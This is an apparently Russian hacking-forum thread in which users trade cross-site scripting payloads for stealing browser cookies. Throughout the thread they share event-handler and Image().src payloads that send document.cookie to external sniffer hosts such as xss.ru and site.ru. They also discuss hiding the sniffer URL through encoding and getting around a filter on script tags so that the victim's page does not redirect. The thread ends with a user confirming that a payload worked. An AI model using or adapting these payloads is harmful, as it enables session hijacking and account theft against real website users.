Функции с xss
 

onload='document.location="http://xss.ru/coc.gif?;"+document.cookie'
этот использует функцию onload
также можно
onmouseover
onmoseout
onerror
и т.д
Но проблема со всеми то что, как страница открывается или когда наводишь курсор на картинку то браузер переходит на страницу которую указал в document.location
Как сделать так, чтобы оставалась таже странице но - никуда не перебрасывало но http://xss.ru/coc.gif?;"+document.cookie срабатывало?
Также прочитал http://forum.antichat.ru/thread18719-xss.html
Пробовал закодировать свой http://xss.ru/coc.gif?;"+document.cookie
в base 64
aHR0cDovL3hzcy5ydS9jb2MuZ2lmPzsiK2RvY3VtZW50LmNvb2 tpZQ==
и когда это встовлял в
onload='document.location="aHR0cDovL3hzcy5ydS9jb2M uZ2lmPzsiK2RvY3VtZW50LmNvb2tpZQ=='
То сниффер не срабатывал.
Чем можно это закодировать, чтоб снифер работал, при этом ссылки сниффера видно не было?

Попробуй через картинку...
<script>
img = new Image()
img.src = "адресс_снифака"+document.cookie;
</script>

так ты не кодируй http:// и слеши тоже =))) И тогда все будет работать =)

Script не могу использовать - фильтруется.
Пробовал закодировать
http://xss.ru/coc.gif?;"+document.cookie в
http://eHNzLnJ1/Y29jLmdpZg==?;"+ZG9jdW1lbnQuY29va2ll
Не пашет.

P.s
Кто чем кодирует и как?

Все с проблемой вылета новой страници разобрался, осталось кодировка :)

Помогите очень, очень надо
(javascript:document.location='http://site.ru/snf.gif?;'+document.cookie)
Открывается в новом окне, как сделать чтоб это срабатывало как картинка и не перескакивало на другую страницу
чета типо
(javascript:image.src='http://site.ru/snf.gif?;'+document.cookie) - только это не работает
Зарание благодарен.

CinerX
Не срабатыват

Хм... странно...
поробуй тогда так:
И вот еще один пример, но он работает только в том случае если есть хоть одна картинка на странице в которую ты будешь совать снифер:

CinerX
+5 :)
Сработало.
Спасибо :)